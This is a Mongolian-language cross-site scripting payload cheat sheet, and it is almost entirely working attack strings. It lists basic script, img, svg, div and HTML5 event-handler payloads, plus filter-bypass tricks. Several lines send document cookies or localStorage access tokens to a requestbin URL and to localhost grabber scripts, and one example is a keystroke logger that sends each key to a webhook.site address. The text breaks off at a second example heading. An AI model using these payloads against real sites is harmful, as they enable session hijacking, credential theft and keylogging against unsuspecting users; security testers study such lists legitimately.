XSS халдлага нь вэб аппликейшны халдлагын нэгээхэн том төлөөлөл бөгөөд хакер энэхүү халдлагыг хийснээр хэрэглэгчдийн session value-г хулгайлах, нууц мэдээллийг олж авах зэрэг олон эрсдэлийг үүсгэх боломжтой
XSS нь дотроо 3 төрөл байдаг
Basic Payload
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="javascript:alert(23)">
<img> tag ашигласан payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<svg> tag ашигласан payload
<svg�onload=alert(1)>
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
<svg><script>alert('33')
<svg><script>alert('33')
<div> tag ашигласан payload
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>
HTML5-н tag-ууд ашигласан payload
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<body ontouchstart=alert(1)> // Triggers when a finger touch the screen
<body ontouchend=alert(1)> // Triggers when a finger is removed from touch screen
<body ontouchmove=alert(1)>
XSS filter bypass аргууд
<sCrIpt>alert(1)</ScRipt>
<script x>
<script x>alert('XSS')<script y>
eval('ale'+'rt(0)');
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
<img src='1' onerror='alert(0)' <
String.fromCharCode(88,83,83)
<a href="" onmousedown="var name = '';alert(1)//'; alert('smthg')">Link</a>
<script>window['alert'](document['domain'])</script>
"></a><img src=x onerror="this.src='https://myrequestbinurl?cookie=' + document.cookie; this.removeAttribute('onerror');"><a>
'<img src="http://any.xngrok.io/img.jpg" onerror="'+payload+'">';
<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
<script>new Image().src="http://localhost/cookie.php?c="+localStorage.getItem('access_token');</script>
XSS халдлагатай холбоотой жишээ 1:
<script>alert(1);</script>
<a href="" onmousedown="var name = '';alert(1)//'; alert('smthg')">Link</a>
<img src=x onerror='document.onkeypress=function(e){fetch("https://webhook.site/22be052b-edfb-4b0b-93fe-184ce68455e0?k="+String.fromCharCode(e.which))},this.remove();'>
XSS халдлагатай холбоотой жишээ 2:
